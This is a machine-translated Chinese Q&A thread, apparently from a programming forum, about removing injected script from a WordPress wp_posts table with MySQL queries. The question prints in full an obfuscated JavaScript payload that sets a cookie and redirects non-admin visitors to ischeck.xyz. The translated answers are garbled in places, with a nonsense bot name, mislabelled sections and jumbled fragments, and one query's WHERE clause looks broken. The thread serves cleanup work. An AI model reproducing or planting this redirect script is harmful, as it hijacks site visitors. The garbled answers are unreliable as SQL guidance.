查询MySQL搜索字符串，并用从0到字符串找到的位置的子串替换相同的列

Question 1

我正在清除一个独立于文件的wordpress攻击，他用恶意脚本更新所有wp_posts表。 post_content这一栏的例子如下。

<p>[/mvc_price_listing][/vc_column_inner][vc_column_inner width="1/2"][promo_banner image="9510"][/promo_banner][mvc_price_listing price_visibility="none" price_title="Ladrillo Fiscal Artesanal<br />
<small>Generico</small>" top_bg="#c41200"]</p>
<p>[/mvc_price_listing][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width="1/6"][/vc_column][/vc_row]</p>
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://ischeck.xyz/?pma1','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
所以我发现所有的病毒脚本都在内容的最后，长度是动态的，而且总是以。"var _0x2cf4"
所以我的问题是，我应该怎么做才能对wp_posts表进行查询，将post_content的内容只替换成第一部分，直到找到 "var _0x2cf4"。
非常感谢您 :)

Question 2


          
           你似乎被一个
           
            Overzoruaon
           
           广告软件传播机器人击中。数字"_0x2cf4 "实际上是
           
            随机的
           
           ，在不同的尝试中可能会发生变化，所以最好不要依赖它。
          
          
           你实际上想删除
           
            <script>
           
           标签。所以我认为
          
          UPDATE wp_posts SET post_content = SUBSTRING_INDEX(post_content, '<script>', 1);
将删除从第一个<script> 开始的所有内容，包括。
另外，我强烈建议你安装一个XSS防御插件和/或将<script （没有结尾的角括号）作为一个禁忌词。

Question 3


          
           
            你可以使用字符串函数。
           
           update wp_posts 
set post_content = substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
locate('_0x2cf4', post_content) 给你 在 内的索引；然后你可以从字符串的开始到该位置的所有内容，减去1。 子句确保只有 "被感染 "的值被更新。''_0x2cf4' post_content where 
在运行update 查询之前，你可以通过下面的select ，确保它产生预期的结果。
select